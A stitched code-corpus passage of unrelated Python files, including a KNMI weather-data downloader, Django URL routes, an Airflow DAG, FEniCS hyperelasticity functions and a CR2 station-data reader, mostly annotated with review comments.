            # FIX: the handler returns raw bytes (r.content); the original read
            # response.text, which always raised AttributeError and was
            # silently swallowed by the except below. Decode the bytes instead.
            result = response.decode('utf-8', errors='replace')
            self.__text_to_database(result)
            fn = 'knmi_source_' + current_day_to_download_formatted + '_to_' + current_day_to_download_end_formatted + '.txt'
            with open(fn, "w") as out_file:
                out_file.write(result)
            print('file has been created : ' + fn)
        except Exception as e:
            # Best-effort: report and continue (matches original behaviour).
            print(e)

    def __text_to_database(self, input_raw_data):
        """Parse the KNMI text dump and bulk-insert the data rows.

        Comment lines start with '#'; empty fields become the string 'NULL'.
        """
        raw_data_split = input_raw_data.split('\n')
        db_query_manager = set_up_database()
        insert_dataset = []
        for line in raw_data_split:
            line = re.sub(r" +", "", line)
            if len(line) > 1 and line[0] != '#':
                line_format = line.rstrip().split(',')
                line_format_with_null = [x if x != '' else 'NULL' for x in line_format]
                insert_dataset.append(line_format_with_null)
                print(line)
        db_query_manager.insert_data(insert_dataset)
class Knmi_interpolated_raster_retrieval(User_input_pipeline):
    """Download daily interpolated raster products from the KNMI Data Platform
    (api.dataplatform.knmi.nl) for the configured date range."""

    api_key = ''
    dataset_raster = {}

    def __init__(self, parent_folder='./data'):
        # FIX: the original invoked the base __init__ twice (explicit call plus
        # super()), repeating the mkdir/chdir side effect.
        super().__init__(parent_folder)

    def set_dataset_raster(self, dataset_raster):
        """dataset_raster is a dict with at least 'name' and 'version' keys."""
        self.dataset_raster = dataset_raster

    def set_api_key(self, api_key):
        """Pick this dataset's key out of a {dataset_name: key} mapping.

        Call set_dataset_raster() first.
        """
        self.api_key = api_key[self.dataset_raster['name']]

    def __get_api_list_files(self):
        """List the dataset files available for [start_date, end_date]."""
        api_url = 'https://api.dataplatform.knmi.nl/open-data'
        api_version = 'v1'
        dataset_name = self.dataset_raster['name']
        dataset_version = self.dataset_raster['version']
        # FIX: this URL was assigned twice identically; one assignment kept.
        ensembled_url = f'{api_url}/{api_version}/datasets/{dataset_name}/versions/{dataset_version}/files'
        timestamp_pattern = self.start_date.strftime('%Y%m%d')
        dataset_name_upper = dataset_name.upper()
        # Listing resumes just after the file name preceding the first day.
        start_after_filename_prefix = f'INTER_OPER_R___{dataset_name_upper}____L3__{timestamp_pattern}'
        days_timedelta = self.end_date - self.start_date
        days_int = days_timedelta.days
        if days_int < 1:
            raise Exception('Start date should be set before end date')
        http_request_params = {
            'maxKeys': str(days_int + 1),
            'Access-Control-Allow-Origin': '*',
            'startAfterFilename': start_after_filename_prefix
        }
        http_request_headers = {'Authorization': self.api_key}
        http_raster_list_request_handler = Knmi_http_request_handler(ensembled_url)
        http_raster_list_request_handler.set_http_request_params(http_request_params)
        http_raster_list_request_handler.set_http_request_headers(http_request_headers)
        list_files_response = http_raster_list_request_handler.handle_http_request()
        # FIX: the handler returns raw bytes, not a Response, so .json() always
        # failed; parse the payload with json.loads (accepts bytes).
        list_files = json.loads(list_files_response)
        dataset_files = list_files.get('files')
        return dataset_files

    def __get_temporary_download_url(self, file):
        """Ask the API for a signed, temporary download URL for `file`."""
        filename = file.get('filename')
        api_url = 'https://api.dataplatform.knmi.nl/open-data'
        api_version = 'v1'
        dataset_name = self.dataset_raster['name']
        dataset_version = self.dataset_raster['version']
        # FIX: restored the {filename} placeholder that had been replaced by a
        # redaction artifact; `filename` was computed but unused otherwise.
        endpoint = f'{api_url}/{api_version}/datasets/{dataset_name}/versions/{dataset_version}/files/{filename}/url'
        http_request_headers = {'Authorization': self.api_key}
        http_raster_url_request_handler = Knmi_http_request_handler(endpoint)
        http_raster_url_request_handler.set_http_request_headers(http_request_headers)
        url_response = http_raster_url_request_handler.handle_http_request()
        # FIX: same bytes-vs-Response issue as above.
        download_url = json.loads(url_response).get('temporaryDownloadUrl')
        return download_url

    def __download_knmi_raster(self, file, knmi_url_download):
        """Download one raster file to the current working directory."""
        filename = file.get('filename')
        http_raster_request = Knmi_http_request_handler(knmi_url_download)
        url_response = http_raster_request.handle_http_request()
        p = Path(filename)
        # FIX: the handler already returns the body bytes (no .content attr).
        p.write_bytes(url_response)
        print(f'{filename} created successfully')

    def download_knmi_interpolated_rasters(self):
        """List all files in range, then fetch each via its temporary URL."""
        list_rasters_download = self.__get_api_list_files()
        for file in list_rasters_download:
            download_url = self.__get_temporary_download_url(file)
            self.__download_knmi_raster(file, download_url)
class Knmi_http_request_handler(object):
    """Thin wrapper around requests.get with configurable params and headers.

    handle_http_request returns the raw response body (bytes) on success;
    on an HTTP error status it prints the server's message and returns None.
    """

    base_url_request = ''
    params_url_request = {}
    headers_url_request = {}

    def __init__(self, base_url):
        self.base_url_request = base_url

    def set_http_request_params(self, params_url_request):
        """Query-string parameters for the next request."""
        self.params_url_request = params_url_request

    def set_http_request_headers(self, headers_url_request):
        """HTTP headers (e.g. Authorization) for the next request."""
        self.headers_url_request = headers_url_request

    def handle_http_request(self):
        """Perform the GET; return body bytes, or None on an HTTP error."""
        try:
            reply = requests.get(
                self.base_url_request,
                headers=self.headers_url_request,
                params=self.params_url_request,
            )
            reply.raise_for_status()
        except requests.exceptions.HTTPError as err:
            print(err.response.text)
            return None
        return reply.content
class knmi_collector(User_input_pipeline):
    """Download the KNMI all-stations yearly zip, filter it with dask to the
    configured date range/columns, and write one CSV (plus a .txt with a
    coordinate header) per day."""

    # Columns kept from the raw KNMI daily file.
    collect_climate_vars_names = ['# STN', 'YYYYMMDD', 'TN', 'TX', 'RH', 'EV24', 'UG', 'TG']

    def __init__(self, parent_folder):
        # NOTE(review): the base __init__ runs twice here (explicit call plus
        # super()), repeating the mkdir/chdir side effect — confirm intended.
        User_input_pipeline.__init__(self, parent_folder)
        super().__init__(parent_folder)

    def read_knmi_all_stations_file(self):
        """Fetch the yearly zip, clean it and write per-day CSV files.

        Returns the dataframe for the last processed date, or None when the
        download fails (errors are printed, not raised).
        """
        base_url = 'https://cdn.knmi.nl/knmi/map/page/klimatologie/gegevens/daggegevens/jaar.zip'
        temp_filename = 'temp_data.zip'
        http_request_params = {}
        http_knmi_source_request_handler = Knmi_http_request_handler(base_url)
        http_knmi_source_request_handler.set_http_request_params(http_request_params)
        try:
            # handle_http_request returns the raw bytes of the zip archive.
            response = http_knmi_source_request_handler.handle_http_request()
            result = response
            with open(temp_filename, 'wb') as compressed_knmi_data:
                compressed_knmi_data.write(result)
            raw_knmi_station_data = db.read_text(temp_filename, compression='zip')
            cleaned_knmi_station_data = self.clean_knmi_raw_data(raw_knmi_station_data)
            filtered_dataframe = self.get_knmi_columns(cleaned_knmi_station_data)
            for str_date in self.get_current_last_dates():
                filtered_dates = self.filter_dates_knmi(filtered_dataframe, str_date)
                filename_current = '{0}.csv'.format(str_date)
                filtered_dates.to_csv(filename_current, index=False, single_file = True)
            return filtered_dates
        except Exception as e: print(e)

    def clean_knmi_raw_data(self, raw_data):
        """Strip leading whitespace, drop blank lines, keep station rows."""
        stripped_rows = db.map(lambda x:x.lstrip(), raw_data)
        stripped_no_blanks = stripped_rows.filter(lambda x:x!='')
        filtered_knmi_data = self.get_knmi_current_stations_data(stripped_no_blanks)
        return(filtered_knmi_data)

    def get_knmi_current_stations_data(self, knmi_data_bag):
        """Split the bag into the '#'-prefixed title row and numeric data rows,
        and build a dask dataframe with the titles as column names."""
        # Rows whose first character is not a digit (currently unused).
        filtered_csv_no_csv = knmi_data_bag.filter(lambda x:re.match('[^0-9]', x[0]))
        filtered_csv_only_titles = knmi_data_bag.filter(lambda x:x[0]=='#')
        filtered_csv_only_values = knmi_data_bag.filter(lambda x:re.match('[0-9]', x[0]))
        titles_row = filtered_csv_only_titles.map(lambda x: x.strip().split(',')).compute()[0]
        titles_row_strip = list(map(lambda x:x.lstrip(), titles_row))
        # Map positional column index -> cleaned title.
        tiles_dict = dict(zip(range(len(titles_row_strip)), titles_row_strip))
        knmi_stations_dataframe_allyear = filtered_csv_only_values.map(lambda x: x.strip().split(',')).to_dataframe()
        knmi_stations_dataframe_allyear_renamed = knmi_stations_dataframe_allyear.rename(columns=tiles_dict)
        return knmi_stations_dataframe_allyear_renamed

    def get_knmi_columns(self, knmi_all_columns):
        """Project the dataframe down to collect_climate_vars_names."""
        knmi_filtered_columns = knmi_all_columns[self.collect_climate_vars_names]
        return knmi_filtered_columns

    def filter_dates_knmi(self, knmi_filtered_columns, str_date):
        """Rows whose YYYYMMDD column equals str_date."""
        filetered_dates = knmi_filtered_columns[knmi_filtered_columns.YYYYMMDD == str_date]
        return filetered_dates

    def get_current_last_dates(self):
        """YYYYMMDD strings from end_date-1 backwards towards start_date.

        NOTE(review): range(1, days_int) yields days_int-1 dates, so both the
        end date itself and the start date are excluded — confirm intended.
        """
        todays_date = datetime.date.today()
        dates_list = []
        days_timedelta = self.end_date - self.start_date
        days_int = days_timedelta.days
        if days_int < 0:
            raise Exception('Start date should be set before end date')
        for days_past in range(1, days_int):
            current_date = self.end_date - datetime.timedelta(days_past)
            dates_list.append(datetime.datetime.strftime(current_date, '%Y%m%d'))
        return dates_list

    def remove_temp_files(self, wild_card = 'zip'):
        """Delete files in the current directory ending with wild_card."""
        test = os.listdir('.')
        for item in test:
            if item.endswith("{0}".format(wild_card)):
                os.remove(item)

    def add_head_files(self):
        """Prefix every CSV in the current directory with coordinate_info.txt,
        writing the result to <name>.txt.

        NOTE(review): file.split('.')[1] assumes exactly one dot per name.
        """
        absolute_path = os.path.join(self.parent_folder, self.target_folder)
        filenames = [file for file in os.listdir('.') if file.split('.')[1] == 'csv']
        for file in filenames:
            with open(file, 'r') as input_file:
                with open('coordinate_info.txt', 'r') as coordinate_file:
                    with open('{0}.txt'.format(file.split('.')[0]),'w') as newf:
                        newf.write(coordinate_file.read())
                        newf.write(input_file.read())
|
from django.conf.urls import url
from .views import AddNotice, ApiViewSet, NoticeYear, NoticeBranch, NoticeBranchYear
# URL table for the notices API.
# NOTE(review): only the first two patterns are anchored with `$`; the last
# three are prefix matches (e.g. /notices/branchyear/extra also resolves) —
# confirm that is intended.
urlpatterns = [
    url(r'^addnotices/$', AddNotice.as_view()),
    url(r'^notices/$', ApiViewSet.as_view()),
    url(r'^notices/year/', NoticeYear.as_view()),
    url(r'^notices/branch/', NoticeBranch.as_view()),
    url(r'^notices/branchyear/', NoticeBranchYear.as_view())
]
|
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python_operator import BranchPythonOperator
from airflow.operators.http_operator import SimpleHttpOperator
from airflow_training.operators.postgres_to_gcs import (
PostgresToGoogleCloudStorageOperator,
)
from airflow.operators import BaseOperator
from airflow.utils.decorators import apply_defaults
from airflow.hooks.http_hook import HttpHook
from airflow.contrib.hooks.gcs_hook import GoogleCloudStorageHook
from airflow.contrib.operators.dataproc_operator import (
DataprocClusterCreateOperator,
DataProcPySparkOperator,
DataprocClusterDeleteOperator,
)
from airflow_training.operators.gcs_to_bq import GoogleCloudStorageToBigQueryOperator
import json
class MyOwnOperator(BaseOperator):
    """Fetch a JSON document over HTTP and upload it to Google Cloud Storage.

    http_endpoint and gcs_filename are templated, so {{ ds }}-style macros
    are rendered before execute() runs.
    """
    template_fields = ("http_endpoint", "gcs_filename")

    @apply_defaults
    def __init__(
        self,
        http_endpoint,        # endpoint path appended to the HTTP connection's host
        http_connection_id,   # Airflow connection id for the HTTP source
        gcs_connection_id,    # Airflow connection id for GCS
        gcs_bucket,
        gcs_filename,
        *args,
        **kwargs
    ):
        super().__init__(*args, **kwargs)
        self.http_endpoint = http_endpoint
        self.http_connection_id = http_connection_id
        self.gcs_connection_id = gcs_connection_id
        self.gcs_bucket = gcs_bucket
        self.gcs_filename = gcs_filename

    def execute(self, context):
        # Download, round-trip through json (validates the payload), spool to a
        # local file, then upload that file to GCS.
        # NOTE(review): writes to the fixed path "data.json" in the worker's
        # cwd, so concurrent task instances on one worker would clobber it.
        print("exec")
        r = self._download_from_http()
        r = json.loads(r)
        with open("data.json", "w") as outfile:
            json.dump(r, outfile)
        self._upload_to_gcs()

    def _upload_to_gcs(self):
        """
        Upload all of the file splits (and optionally the schema .json file) to
        Google Cloud Storage.
        """
        hook = GoogleCloudStorageHook(
            google_cloud_storage_conn_id=self.gcs_connection_id
        )
        hook.upload(self.gcs_bucket, self.gcs_filename, "data.json", "application/json")

    def _download_from_http(self):
        """GET self.http_endpoint via the configured connection; return body text."""
        http = HttpHook("GET", http_conn_id=self.http_connection_id)
        self.log.info("Calling HTTP method")
        response = http.run(self.http_endpoint)
        self.log.info(response.text)
        return response.text
# Daily pipeline: export UK land-registry prices and exchange rates to GCS,
# crunch them on an ephemeral Dataproc cluster, then load results to BigQuery.
dag = DAG(
    dag_id="superjob",
    default_args={
        "owner": "naamhierinvullen",
        "start_date": airflow.utils.dates.days_ago(7),
    },
    schedule_interval="@daily",
    catchup=False,
)
# Ephemeral per-run cluster, named after the execution date.
dataproc_create_cluster = DataprocClusterCreateOperator(
    task_id="dataproc_create_cluster",
    cluster_name="analyse-pricing-{{ ds }}",
    project_id="airflowbolcom-may2829-b2a87b4d",
    num_workers=2,
    zone="europe-west4-a",
    dag=dag,
)
dataproc_remove_cluster = DataprocClusterDeleteOperator(
    task_id="dataproc_remove_cluster",
    cluster_name="analyse-pricing-{{ ds }}",
    project_id="airflowbolcom-may2829-b2a87b4d",
    dag=dag,
)
# PySpark job: joins the daily load with the exchange rate and writes parquet.
dataproc_run_pyspark = DataProcPySparkOperator(
    task_id="dataproc_run_pyspark",
    main="gs://een_emmer/build_statistics.py",
    cluster_name="analyse-pricing-{{ ds }}",
    arguments=[
        "gs://een_emmer/daily_load_{{ ds }}",
        "gs://een_emmer/exchangerate_{{ ds }}.txt",
        "gs://een_emmer/dataproc_output_{{ ds }}",
    ],
    dag=dag,
)
prices_uk_from_postgres_to_cloudstorage = PostgresToGoogleCloudStorageOperator(
    task_id="prices_uk_from_postgres_to_cloudstorage",
    sql="SELECT * FROM land_registry_price_paid_uk WHERE transfer_date = '{{ ds }}'",
    bucket="een_emmer",
    filename="daily_load_{{ ds }}",
    postgres_conn_id="stuff_postgres",
    dag=dag,
)
exchange_rate_to_gcs = MyOwnOperator(
    task_id="exchange_rate_to_gcs",
    dag=dag,
    http_connection_id="http_exchangerate",
    http_endpoint="/airflow-training-transform-valutas?date={{ ds }}&to=EUR",
    gcs_connection_id="google_cloud_default",
    gcs_bucket="een_emmer",
    gcs_filename="exchangerate_{{ ds }}.txt",
)
write_to_bq = GoogleCloudStorageToBigQueryOperator(
    task_id="write_to_bq",
    bucket="een_emmer",
    source_objects=["dataproc_output_{{ ds }}/part*.parquet"],
    destination_project_dataset_table="airflowbolcom-may2829-b2a87b4d:ditiseendataset.land_registry_prices{{ ds_nodash }}",
    source_format="PARQUET",
    write_disposition="WRITE_TRUNCATE",
    dag=dag,)
# Task graph: both extracts fan in before the cluster is created; BigQuery
# load runs last (it reads the parquet output from GCS, not the cluster).
[
    prices_uk_from_postgres_to_cloudstorage,
    exchange_rate_to_gcs,
] >> dataproc_create_cluster >> dataproc_run_pyspark >> dataproc_remove_cluster >> write_to_bq
|
#!/usr/bin/env python3
import sys, argparse
from pathlib import Path
from Bio import SeqIO
def main():
    """Filter a sequence file, keeping records at least --minlen bases long."""
    print("""Size selector""")
    parser = argparse.ArgumentParser()
    parser.add_argument("--in", type=str,
                        action="store", dest="input",
                        help="Path to sequence file")
    parser.add_argument("--minlen", type=int,
                        action="store", dest="minlen",
                        help="Minimum sequence size (inclusive)")
    parser.add_argument("--out", type=str,
                        action="store", dest="output",
                        help="Output path. Will create directory if it doesn't exist. Default='./<input>.min<minsize>.<filetype>'")
    # No arguments at all: show usage and stop.
    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    args = parser.parse_args()

    source = Path(args.input)
    # File format for SeqIO is taken from the extension (e.g. ".fasta").
    seq_format = source.suffix.split(".")[-1]
    total = 0
    kept = []
    with open(source, "r") as handle:
        for record in SeqIO.parse(handle, seq_format):
            total += 1
            if len(record.seq) >= int(args.minlen):
                kept.append(record)

    if args.output is not None:
        out_path = Path(args.output)
    else:
        out_path = Path("{}.min{}{}".format(source.stem, args.minlen, source.suffix))
    out_path.parent.mkdir(parents=True, exist_ok=True)
    SeqIO.write(kept, out_path, seq_format)
    print("{} original sequences\n{} less than {}\n{} sequences written to {}".format(total, total-len(kept), args.minlen, len(kept), out_path))
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Run only when executed as a script.
if __name__ == "__main__":
    main()
|
"""
Profile Page app API URLs.
"""
from django.urls import path
from profile_page.api import api
from . import views
# URL routes for the profile-page view and its JSON API.
urlpatterns = [
    # Views
    path('', views.profile_page, name='profile-page'),
    # Profile Page API Calls for Authentication
    path('api', api.api_overview, name='profile-page-api_overview'),
    path('api/register', api.register, name='profile-page-register'),
    path('api/login', api.login, name='profile-page-login'),
    path('api/logout', api.logout, name='profile-page-logout'),
    path('api/delete', api.delete, name='profile-page-delete'),
    # Get all profile information
    path('api/profile', api.profile, name='profile-page-profile'),
    # Adding, removing, and accepting friend
    path('api/add_friend', api.add_friend, name='profile-page-add_friend'),
    path('api/accept_decline_friend', api.accept_decline_friend, name='profile-page-accept_friend'),
    path('api/remove_friend', api.remove_friend, name='profile-page-remove_friend'),
    # Game Board Import/Export API calls
    path('api/save_board', api.save_board, name='profile-save_board'),
    path('api/delete_board', api.delete_board, name='profile-delete_board'),
    path('api/share', api.share, name='profile-share'),
    path('api/saved_boards/<str:user_id>/<str:token>', api.saved_boards, name='profile-saved_boards'),
    path('api/load_board', api.load_board, name='profile-load_board'),
    # Heroku scheduler
    path('api/scheduled_tasks', api.scheduled_tasks, name='profile-scheduled_tasks'),
]
|
class Solution(object):
    def numMagicSquaresInside(self, grid):
        """
        Count 3x3 "magic square" subgrids of grid (LeetCode 840).

        A magic square contains the distinct numbers 1..9 with every row,
        column and both diagonals summing to the same value (necessarily 15).

        :type grid: List[List[int]]
        :rtype: int

        Fixes vs. the original: the builtin name `sum` is no longer shadowed,
        a duplicated row-sum comparison was removed, and distinctness of the
        digits 1..9 is now enforced (a grid of all 5s previously counted).
        """
        result = 0
        for y in range(2, len(grid)):
            for x in range(2, len(grid[y])):
                if self._is_magic(grid, x, y):
                    result += 1
        return result

    def _is_magic(self, grid, x, y):
        # (x, y) is the bottom-right corner of the candidate 3x3 square.
        square = [grid[y - 2 + i][x - 2 + j] for i in range(3) for j in range(3)]
        # Distinct digits 1..9 (also covers the range check).
        if sorted(square) != list(range(1, 10)):
            return False
        lines = (
            square[0:3], square[3:6], square[6:9],     # rows
            square[0::3], square[1::3], square[2::3],  # columns
            [square[0], square[4], square[8]],         # main diagonal
            [square[2], square[4], square[6]],         # anti-diagonal
        )
        return all(sum(line) == 15 for line in lines)

    def numbersBetween1To9(self, grid, x, y):
        """True when every cell of the 3x3 square ending at (x, y) is in 1..9."""
        for i in range(y - 2, y + 1):
            for j in range(x - 2, x + 1):
                if grid[i][j] > 9 or grid[i][j] < 1:
                    return False
        return True
# Ad-hoc smoke test of the solver (expected output: 1, 0, 0).
solution = Solution()
print(solution.numMagicSquaresInside([[4,3,8,4],[9,5,1,9],[2,7,6,2]]))
print(solution.numMagicSquaresInside([[7,0,5],[2,4,6],[3,8,1]]))
print(solution.numMagicSquaresInside([[10,3,5],[1,6,11],[7,9,2]]))
print(solution.numMagicSquaresInside([[7,6,2,2,4],[4,4,9,2,10],[9,7,8,3,10],[8,1,9,7,5],[7,10,4,11,6]])) |
import fenics as fa
def DeformationGradient(u):
    """Deformation gradient F = I + grad(u), wrapped as a FEniCS variable."""
    identity = fa.Identity(u.geometric_dimension())
    displacement_gradient = fa.grad(u)
    return fa.variable(identity + displacement_gradient)
def DetDeformationGradient(u):
    """Jacobian J = det(F(u)), wrapped as a FEniCS variable."""
    return fa.variable(fa.det(DeformationGradient(u)))
def RightCauchyGreen(F):
    """Right Cauchy-Green tensor C = F^T F, wrapped as a FEniCS variable."""
    C = F.T * F
    return fa.variable(C)
def Invariants(A):
    """Return the three principal invariants [I1, I2, I3] of a tensor A."""
    trace_A = fa.tr(A)
    first = trace_A
    second = 0.5 * (trace_A ** 2 - fa.tr(A * A))
    third = fa.det(A)
    return [first, second, third]
def NeoHookeanEnergy(u, young_modulus, poisson_ratio, return_stress=False, fluctuation=False, F_list=None):
    """Nearly-incompressible neo-Hookean strain energy (plane-strain form).

    Parameters
    ----------
    u : displacement field
    young_modulus, poisson_ratio : material constants (Poisson must be < 0.5)
    return_stress : also return the first Piola-Kirchhoff stress dW/dF
    fluctuation : delegate to the fluctuation formulation using F_list
    F_list : macroscopic deformation-gradient entries for the fluctuation case

    Returns
    -------
    energy, or (energy, first_pk_stress) when return_stress is True.
    """
    if poisson_ratio >= 0.5:
        raise ValueError(
            "Poisson's ratio must be below isotropic upper limit 0.5. Found {}"
            .format(poisson_ratio))
    if fluctuation:
        return NeoHookeanEnergyFluctuation(u, young_modulus, poisson_ratio,
                                           return_stress, F_list)
    shear_mod = young_modulus / (2 * (1 + poisson_ratio))
    bulk_mod = young_modulus / (3 * (1 - 2 * poisson_ratio))
    F = fa.variable(DeformationGradient(u))
    J = fa.det(F)
    I1 = fa.tr(RightCauchyGreen(F))
    # Plane strain assumption: the out-of-plane stretch contributes +1 to I1.
    Jinv = J ** (-2 / 3)
    energy = ((shear_mod / 2) * (Jinv * (I1 + 1) - 3) +
              (bulk_mod / 2) * (J - 1) ** 2)
    if return_stress:
        # FIX: the original built an analytic expression for the stress and
        # then immediately overwrote it with fa.diff(energy, F); only the
        # derivative (the value actually returned) is kept here.
        first_pk_stress = fa.diff(energy, F)
        return energy, first_pk_stress
    return energy
# Deformation gradient for the fluctuation formulation.
def DeformationGradientFluctuation(v, F_list):
    """Deformation gradient built from a fluctuation field `v` plus a
    prescribed macroscopic contribution given by `F_list` (matrix entries)."""
    F_I = fa.as_matrix(F_list)  # macroscopic deformation-gradient part
    grad_u = fa.grad(v) + F_I
    I = fa.Identity(v.geometric_dimension())
    # NOTE(review): returns I + grad(v) + F_I. If F_list already contains the
    # full macroscopic F (identity included) the identity is double counted —
    # confirm F_list holds only the displacement-gradient part.
    return fa.variable(I + grad_u)
def NeoHookeanEnergyFluctuation(v, young_modulus, poisson_ratio, return_stress, F_list):
    """Neo-Hookean energy for a fluctuation field `v` around the macroscopic
    gradient F_list (see DeformationGradientFluctuation).

    Returns energy, or (energy, dW/dF) when return_stress is True.
    """
    shear_mod = young_modulus / (2 * (1 + poisson_ratio))
    bulk_mod = young_modulus / (3 * (1 - 2*poisson_ratio))
    d = v.geometric_dimension()  # NOTE(review): unused
    F = DeformationGradientFluctuation(v, F_list)
    F = fa.variable(F)
    J = fa.det(F)
    Jinv = J**(-2 / 3)
    I1 = fa.tr(RightCauchyGreen(F))
    # Plane-strain form: the out-of-plane stretch contributes +1 to I1.
    energy = ((shear_mod / 2) * (Jinv * (I1 + 1) - 3) +
              (bulk_mod / 2) * (J - 1)**2)
    if return_stress:
        # First Piola-Kirchhoff stress as the energy derivative w.r.t. F.
        first_pk_stress = fa.diff(energy, F)
        return energy, first_pk_stress
    return energy
|
import random
__all__ = ['say']
def say(*args, **kwargs):
    """Build an Alice-style response dict.

    Positional arguments are candidate phrases (str) — one is chosen at
    random for response['text'] — or callables that receive the response
    dict and may mutate it. Keyword arguments seed the response;
    'end_session' defaults to False. Raises ValueError on other arg types.
    """
    for item in args:
        if not (isinstance(item, str) or callable(item)):
            raise ValueError('Each argument of say(...) must be str or callable')
    response = dict(kwargs)
    phrases = [phrase for phrase in args if isinstance(phrase, str)]
    if phrases:
        response['text'] = random.choice(phrases)
    response.setdefault('end_session', False)
    for hook in args:
        if callable(hook):
            hook(response)
    return response
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 14 11:53:19 2017
@author: cvpr
"""
import xlrd
# Convert the CSIQ DMOS spreadsheet into a "<image name> <dmos>" label file.
# NOTE(review): Python 2 only (print statement below).
data = xlrd.open_workbook('./csiq.DMOS.xlsx')
try:
    sheet = data.sheet_by_name('all_by_distortion')
except:
    # Bare except kept as-is; any failure is treated as a missing sheet.
    print 'No sheet named: all_by_distortion'
    exit(0)
# The first 4 rows are header; column 3's length gives the data row count.
sheet_len = len(sheet.col(3))-4
file_path = './csiq_label.txt'
f_ptr = open(file_path, 'wt')
for i in range(sheet_len):
    dst_type = sheet.col(4)[i+4].value
    image = sheet.col(5)[i+4].value
    dst_lev = sheet.col(6)[i+4].value
    dmos = sheet.col(11)[i+4].value
    # Normalise distortion names to the dataset's file-name conventions.
    if dst_type == 'noise':
        dst_type = 'AWGN'
    elif dst_type == 'jpeg' or dst_type == 'blur':
        dst_type = dst_type.upper()
    elif dst_type[:4] == 'jpeg':
        # Catches 'jpeg 2000'-style labels (plain 'jpeg' is handled above).
        dst_type = 'jpeg2000'
    else:
        dst_type = dst_type
    #print image, dst_type, dst_lev, dmos
    if type(image) == float:
        # Numeric image ids come back from xlrd as floats.
        image = str(int(image))
    img_name = image + '.' + dst_type + '.' + str(int(dst_lev)) + '.png'
    f_ptr.write('{:s} {:.6f}\n'.format(img_name, dmos))
f_ptr.close()
|
import os
from acme_diags.parameter.core_parameter import CoreParameter
from acme_diags.parameter.area_mean_time_series_parameter import AreaMeanTimeSeriesParameter
from acme_diags.run import runner
# Driver script: area-mean time-series diagnostics comparing E3SM v1 ensemble
# members against each other (model-vs-model).
param = CoreParameter()
# For compy
machine_path_prefix = '/compyfs/e3sm_diags_data/'
# For cori
# machine_path_prefix = '/global/project/projectdirs/acme/acme_diags'
param.test_data_path = os.path.join(machine_path_prefix, 'test_model_data_for_acme_diags/time-series/E3SM_v1_historical_r1/')
# param.reference_data_path = os.path.join(machine_path_prefix, 'obs_for_e3sm_diags/time-series/')
param.reference_data_path = os.path.join(machine_path_prefix, 'test_model_data_for_acme_diags/time-series/')
param.test_name = 'e3sm_v1'
# FIX: the attribute was misspelled 'rune_type', which silently set an unused
# attribute and left the run type at its default.
param.run_type = 'model-vs-model'
prefix = '/compyfs/www/zhan429/examples/'
param.results_dir = os.path.join(prefix, 'area_mean_with_models')
param.multiprocessing = True
param.num_workers = 40
# We're passing in this new object as well, in
# addtion to the CoreParameter object.
ts_param = AreaMeanTimeSeriesParameter()
ts_param.ref_names = ['E3SM_v1_historical_r2', 'E3SM_v1_historical_r3', 'E3SM_v1_historical_r4', 'E3SM_v1_historical_r5'] #This setting plot model data only
ts_param.start_yr = '1850'
ts_param.end_yr = '2014'
runner.sets_to_run = ['area_mean_time_series']
runner.run_diags([param, ts_param])
|
import os
import logging
from matplotlib.dates import date2num
from calendar import monthrange
import numpy as np
import IncludeFile as IncF
# import datetime as dt
from datetime import datetime, timedelta, date
import pdb
import sys
import bisect
import pandas as pds
import mospat_inc_directories as IncDir
import datetime as dt
from INetwork import INetwork
import networkNames as names
class CR2(INetwork):
    """Reader for CR2 (Center for Climate and Resilience Research) daily
    station data text dumps (temperature / precipitation)."""

    def setName(self):
        return names.cr2_data

    def read(self, c_Variables):
        """Read the CR2 file for `c_Variables` and return (t_StationData, c_TimeFrec).

        t_StationData maps field names to per-station values/lists (name, lon,
        lat, elevation, dates, data) for the period from IncF.c_Start_Date to
        IncF.c_Last_Date; missing values (-9999.0) become NaN.
        """
        c_Network = self.name
        logging.info('READING CR2 DATA')
        c_ObsDir = IncDir.c_ObsNetDir
        c_ObsNetName = IncDir.c_ObsNetName
        t_VarsUnits = {'TEMP': 'degC', 'PRECIP': 'mm/day'}
        idx_Network = c_ObsNetName.index(c_Network)
        c_DataDirectory = c_ObsDir[idx_Network]
        # NOTE(review): only TEMP defines c_VarDir/c_File/c_TimeFrec; any other
        # variable raises NameError below — confirm callers only pass 'TEMP'.
        if c_Variables == 'TEMP':
            c_VarDir = 'cr2_tasDaily_2018'
            c_File = 'cr2_tasDaily_2018.txt'
            c_TimeFrec = 'Daily'
        c_FileDir = c_DataDirectory + c_Variables[:] + '/' + c_VarDir + '/'
        c_FileName = c_FileDir + c_File
        df = pds.read_csv(c_FileName, delimiter=',', index_col=0)
        # FIX: DataFrame.as_matrix() was removed in pandas 1.0; .values is the
        # long-standing equivalent.
        f_Data = df.values
        nstations = f_Data.shape[1]
        # Creating Vectors with Names, Height, Longitude and Latitude
        c_AllStations = []
        c_AllLon = []
        c_AllLat = []
        c_AllHeights = []
        for idx in range(nstations):
            c_AllStations.append(df.loc['nombre'][idx])
            c_AllLon.append(df.loc['longitud'][idx])
            c_AllLat.append(df.loc['latitud'][idx])
            c_AllHeights.append(df.loc['altura'][idx])
        c_Index = df.index  # dates in string format
        c_IndexNew = [str(x) for x in c_Index]
        # Linear search for the marker row separating metadata from data.
        # NOTE(review): loops forever if 'inicio_automatica' is missing.
        idx = -1
        while idx < 0:
            for iaux in range(len(c_IndexNew)):
                if c_IndexNew[iaux] == 'inicio_automatica':
                    idx = iaux + 1
        logging.info('Indice Primera Fecha %s', idx)
        logging.info('iaux %s', iaux)
        logging.info('%s', c_IndexNew[idx])
        c_AllDates = c_IndexNew[idx:]
        d_AllDates = [datetime.strptime(c_Date, "%Y-%m-%d") for c_Date in c_AllDates]
        # DEFINING INITIAL AND FINAL DATE
        f_YearIni = dt.datetime.strptime(IncF.c_Start_Date[0], '%d-%m-%Y').year
        f_YearFin = dt.datetime.strptime(IncF.c_Last_Date[0], '%d-%m-%Y').year
        f_MonthIni = dt.datetime.strptime(IncF.c_Start_Date[0], '%d-%m-%Y').month
        f_MonthFin = dt.datetime.strptime(IncF.c_Last_Date[0], '%d-%m-%Y').month
        # FIX: `01` is a Python 2 octal literal and a SyntaxError in Python 3.
